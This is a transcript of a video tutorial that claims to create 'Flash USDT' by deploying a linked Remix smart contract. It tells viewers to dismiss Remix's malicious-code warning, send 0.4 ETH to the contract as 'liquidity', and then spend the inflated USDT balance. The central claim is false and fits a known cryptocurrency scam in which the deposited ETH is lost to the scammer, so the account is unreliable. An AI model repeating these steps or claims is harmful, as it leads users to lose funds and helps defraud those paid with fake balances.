Hello everyone, welcome to this tutorial. Today, I will show you how to create Flash USDT on the ERC20 network using Remix and MetaMask. So we'll be using Remix and MetaMask to create Flash USDT. Yeah. In this video, we will deploy a smart contract that manipulates USDT balance to reflect the amount you set in the smart contract. For instance, if you want the USDT balance to be 50 million, you're actually going to set the 50 million in the smart contract in order to manipulate the balance to reflect 50 million. As you can see, we currently have 0 USDT, but at the end of this video you are going to see millions of USDT here in this balance. So if you want to reflect 1 billion, make sure you specify the 1 billion in the smart contract. I'll be guiding you step by step on how to do this. The link to this smart contract code will be at the video description. All right. Before we get started, make sure you deposit at least 0.5 Ethereum in your wallet, because we will be using this Ethereum as liquidity to manipulate this USDT balance. We use this Ethereum as liquidity to manipulate the USDT balance. All right. Let us get started. Firstly, head over to your browser and search Remix Ethereum IDE. Once you search Remix Ethereum IDE, you click on the first link. In my case, I'm already open to Remix Ethereum IDE. After opening the Remix IDE, the first thing you want to do is to head over to File, create a new file. You can give this file any name of your choice, but in my case, I'm gonna name it Flash USDT. And press enter. Now we just created a new file. I will pass the smart contract code here. Once you pass the code, you are going to receive this warning. This warning is due to the logic in the smart contract. So is the logic to manipulate the balance, to manipulate everything. So the Remix IDE detect it as malicious because it manipulates USDT balance to make it reflect higher than the actual amount that was there. So what you have to do here is just to click on close. The next thing you have to do is go to Solidity compiler here on this button, Solidity compiler. Make sure you select the Solidity version. The Solidity version should be 0.8.19. Make sure you select 0.8.19. If it is not set, select 0.8.19 and compile. Now we just compile the file. The next thing is to head over to deploy and run transaction. Once you head to deploy and run transaction, go to the environment. Make sure you should connect your MetaMask here at the environment. You can choose to connect using injected provider or wallet connect. In my case, I will be going with wallet connect. I click connect. I'm going to select MetaMask. Still loading. I'm going to connect. All right, now we successfully connect our wallet. The next thing is to navigate down here. Make sure you click the drop down, or this the tricky part. Make sure you set the amount of USDT you wish to reflect in your wallet. If you want the balance to reflect as 10 million, make sure you include 10 million USDT here. If you want the balance to reflect as 20 million, you have to type 20 million in this fake USDT balance field. In my case, I'm going to be typing 56 million. I'm going to be typing 56 million USDT. And then I will click on transact. Confirm. We are going to select the gas fee and confirm. Right, our transaction has been confirmed. So since our transaction have been confirmed, the next thing we have to do is this our deploy transaction. We'll just deploy the transaction. You are going to click here, and then this our newly created contract. Once you deploy, you are going to get your own unique contract address. You copy your contract address here to add the liquidity. Now it's time for us to send the liquidity. In order to execute the manipulation, we have to copy our contract address. This is my newly created contract address. So once you deploy the file, you are going to be given a unique contract address. So I copy my contract address, head over to MetaMask, and then send. Make sure you send 0.4 Ethereum to your contract address. This 0.4 Ethereum will be used as liquidity to manipulate the USDT balance into reflecting the specified figure that you set at the fake balance fee. So you deposit 0.4 Ethereum. I'll deposit 0.4 Ethereum. Now our deposit is pending. Yeah, congratulations, the deposits have been confirmed, but our balance is not yet reflected. We have to come here to call this action. As we just deposited the liquidity, now it's time for us to come and call the action button. Yes, it's time for us to come and call the action button. Let's come over here, call the action button. After you finish deploying the contract, make sure you come here, you call this action button. It's still pending. The action button is still pending here, so you can see it's still pending. So we're going to wait for it to pen. Now, yes, you confirm here. As you confirm, it's still pending. Make sure you wait. You should be patient for the pending process to complete. The transaction is not yet completed, so you wait. All right, now that the transaction is here, you confirm here. You confirm. Yes, once you confirm, you wait a little bit for it to confirm. No, the transaction failed. Let us try the action button again. Since the transaction failed for the first time, we'll try the action button again. We confirm here. Now I know the problem. The reason why the transaction failed for the first time is because the gas fee here is too low for the transaction. So you have to click on this here and you select higher amount of gas fee. For example, here or here, I'm going to go with higher amount of gas fee. Yeah, so anytime the transaction fee, make sure you try to increase the gas fee to make sure the transaction go through successfully. So I'm going to go continue here, confirm the transaction. Yeah, it's still pending. As you can see, the transaction has been confirmed. Now it's time for us to head over to our wallet and reflect our balance. The transaction has been confirmed. Let us head over to our wallet to reflect our USDT balance. As you can see, it's still not arrived. We are going to refresh, refresh the balance. As you can see, the balance has been successfully manipulated. You can see this is 56 million USDT and 56 million USDT. We successfully manipulated this USDT balance. Now that we successfully manipulate this balance, I will be transferring from this MetaMask wallet to my other Android phone. I'll be transferring from this MetaMask wallet on my computer to the other MetaMask in my Android phone. So I'm going to be connecting my Android phone here. I'll be connecting my Android phone here. As you can see, here is my Android screen. So here is my Android screen. I'll be transferring this MetaMask here. You can actually transfer this coin to other MetaMask, to Trust Wallet, or to Coinbase Wallet. So as you can see, I'll copy my MetaMask address here and send to my computer. I'll copy the address from my device. I'm going to copy the MetaMask address. I think having some issues with network. I'm going to be copying, as I just copied the address, and I'm going to my Telegram to send to my computer because I don't actually have it there. I'm going to send it to my computer. Yes, I just sent the address. As you can see, here is the address. I'm going to copy the address here. I'm going to copy the address. Let's just minimize this. I just copy the address, and then as I copy the address, I go here on MetaMask, the MetaMask on my computer. I will then try to send from my MetaMask wallet to my Android. Let's try to send here. I'm going to pass my address. Then I'm going to send about I'm going to send 12 million USDT to my other wallet. As you can see, this 12 million USDT, and then I confirm. I confirm. As you can see, the transaction is still pending. The transaction is pending. Now the transaction has been confirmed. Let's just wait to see if we receive here in my wallet here on MetaMask. Since the transaction has been confirmed, on the other side, let's just wait to receive here on my device. Please guys, be patient, and we are going to receive the transaction here because I'm having some network issue.